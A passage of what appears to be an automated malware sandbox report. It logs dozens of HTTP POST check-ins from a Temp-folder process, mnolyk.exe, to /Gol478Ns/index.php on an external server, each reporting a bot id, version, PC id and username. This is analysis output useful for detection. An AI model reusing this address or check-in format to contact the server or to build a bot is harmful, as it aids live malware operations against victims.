                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:18.087846994 CET516INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      78192.168.2.74980362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:18.277309895 CET516OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:18.340989113 CET517INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      79192.168.2.74980462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:18.533345938 CET517OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:18.596836090 CET518INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      8192.168.2.74973262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:35:59.129342079 CET440OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:35:59.197772980 CET440INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      80192.168.2.74980562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:18.799887896 CET518OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:18.864208937 CET519INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      81192.168.2.74980662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:19.040858030 CET519OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:19.107131004 CET520INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      82192.168.2.74980762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:19.287197113 CET520OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:19.352997065 CET521INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      83192.168.2.74980862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:19.520673037 CET521OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:19.583667994 CET522INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      84192.168.2.74980962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:19.755074978 CET522OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:19.818711996 CET523INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      85192.168.2.74981062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:19.991660118 CET523OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:20.057945013 CET524INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      86192.168.2.74981162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:20.234433889 CET524OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:20.297949076 CET525INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      87192.168.2.74981262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:20.476057053 CET525OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:20.538273096 CET526INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      88192.168.2.74981362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:20.733652115 CET526OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:20.797667980 CET527INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      89192.168.2.74981462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:20.972676992 CET527OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:21.035640955 CET528INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      9192.168.2.74973362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:35:59.781455994 CET441OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:35:59.849287033 CET441INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      90192.168.2.74981562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:21.210733891 CET528OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:21.274374008 CET529INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      91192.168.2.74981662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:21.444072008 CET529OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:21.512933016 CET530INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      92192.168.2.74981762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:21.693658113 CET530OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:21.758744001 CET531INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      93192.168.2.74981862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:21.931466103 CET531OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:21.996027946 CET532INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      94192.168.2.74981962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:22.168381929 CET532OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:22.234762907 CET533INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
